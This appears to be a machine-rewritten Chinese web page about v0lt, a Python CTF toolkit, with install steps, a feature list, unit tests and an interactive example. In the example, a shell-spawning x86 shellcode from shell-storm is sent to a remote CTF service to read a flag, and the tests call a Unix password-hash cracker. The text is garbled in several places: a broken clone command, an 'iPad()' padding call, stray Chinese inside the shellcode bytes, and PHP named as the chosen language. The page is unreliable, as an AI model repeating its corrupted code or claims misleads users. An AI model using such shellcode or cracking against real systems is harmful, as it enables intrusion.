安全工具包v0lt,CTF
"0×01 v0lt
v0lt是一个我试着资产重组每一个我使用过的/目前在使用的/未来得用的用python研发的安全行业CTF工具。实践活动任务可能会采用bash脚本来解决,但我觉得PHP更具有协调能力,这也就是我做到这一选择的原因。和荷兰CTF团队Gallopsled研发的pwntools 没有关系,v0lt只是一个中小型灵活性但是却具有一些特别功能的工具包。
0×01 要求和安装
依赖关系:
Libmagic
Python3
BeautifulSoup
Requests
filemagic
hexdump
passlib
安装:
git clone htpp://github.Com/P1kachu/v0lt.git CDR v0lt
[sudo] python3 setup.py install # 要求sudo实行意味着可能存在缺少的依赖关系
范例: Shellcodes
>>> from v0lt import *
>>> nc = Netcat(""archpichu.ddns.net"", 65102)
Connected To port 65102 >>> print(nc.read())
GIVE ME SHELLCODZ >>> shellhack = ShellHack(4096, ""bin"",""execve"") >>> shellhack.put_shellcodes(shellhack.keywords)
...... 90: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 56 bytes 87: Linux/x86:execve (/bin/sh) - 21 Bytes 83: Linux/x86:break chroot execve /bin/sh - 80 bytes 66: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...... Selection: 87 Your choice: .com://shell-storm.org/shellcode/files/shellcode-752.Python Shellcode: ""\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[有限公司]"" >>> nc.shellcat(shellhack.shellcode) >>> nc.writeln(shellhack.iPad()) >>> exploit = nc.dialogue(""cat flag"", 3) >>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File name too long
P1kaCTF{sh3llc0de_1s_e4zY}
实现功能:
加锁
Base64
凯撒挪动
哈希功能(SHA, MD5)
位运算(XOR, 反向XOR)
常见变换(bytes, strings, hex)
RSA基础控制模块 (逆模, 逆幂, 实现RSA共模进攻的egcd脚本…)
暴力破解(来源于词典, 自定义词)
Shellcodes
从Jonathan Salwan的个人博客网站Shell-storm选中Shellcode合用repo工具免费下载
Shellcode文件类型
Shell{cat,net}: 轻松发送到Shellcode
自动填充
接入支持
Netcat
Telnet
更多可获得的实例:
import unittest from v0lt import *
__author__ = 'P1kachu' class Tests(unittest.TestCase): def test_netcat(self): nc = Netcat(""archpichu.ddns.net"", 65103)
self.assertEqual(nc.read(), ""\nNothing to display yet...\n"") def test_telnet(self): tl = Telnet(""archpichu.ddns.net"", 65103)
self.assertEqual(tl.read(), ""\nNothing to display yet...\n"") def test_stack(self): stack = Stack()
self.assertEqual(stack.size(), 0)
stack.push(""item"")
self.assertEqual(stack.is_empty(), False)
self.assertEqual(stack.size(), 1)
item = stack.pop()
self.assertEqual(stack.size(), 0)
self.assertEqual(item, ""item"")
self.assertEqual(stack.is_empty(), True) def test_basic_ceasar(self): plaintext = ""This is a ceasar plaintext"" encrypted = ""GUVF VF N PRNFNE CYNVAGRKG"" deciphered = basic_ceasar(plaintext, offset=13)
self.assertEqual(encrypted, deciphered) def test_get_shellcode(self): sh = ShellHack(70, ""/bin/lol"")
sh.get_shellcodes(sh.keywords)
sh = ShellHack(70, ""/bin/sh"")
sh.get_shellcodes(sh.keywords) def test_flag_gen(self): flags_gen(""flags.tmp"", ""P1ka"", 10) def test_find_nth(self): self.assertEqual(find_nth(""lolilol"", ""l"", 3), 6)
self.assertEqual(find_nth(""lolilol"", ""l"", 4), -1) def brute(self): bf = Bruteforce(charset=""abcd"", final_length=5, begin_with=""l"", end_with=""P"")
bf.generate_strings()
bf = Bruteforce(charset=""abcdef"", final_length=12, begin_with=""l"", end_with=""P"")
bf.generate_strings(output=""bf.tmp"") def test_hex(self): he = Hexeditor()
he.dump_file(""setup.py"")
he.save_file_as_hex(""save.tmp"")
he.restore_file(""test1.tmp"")
he.restore_file(""test2.tmp"", ""save.tmp"") def test_passwd_cracker(self): nix_basic_pass_cracker(""HX9LLTdc/jiDE"")
nix_basic_pass_cracker(""HX8LLTdc/jiDE"") # nix_basic_pass_cracker(""$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1"") # n
相关文章
- 2条评论
只影池予2022-05-29 05:43:21- shellcat(shellhack.shellcode) >>> nc.writeln(shellhack.iPad()) >>> exp
夙世箴词2022-05-29 12:45:12- HA, MD5)位运算(XOR, 反向XOR)常见变换(bytes, strings, hex)RSA基础控制模块 (逆模, 逆幂, 实现RSA共模进攻的egcd脚本…)暴力破解(来源于词典, 自定义词)She
滇ICP备19002590号-1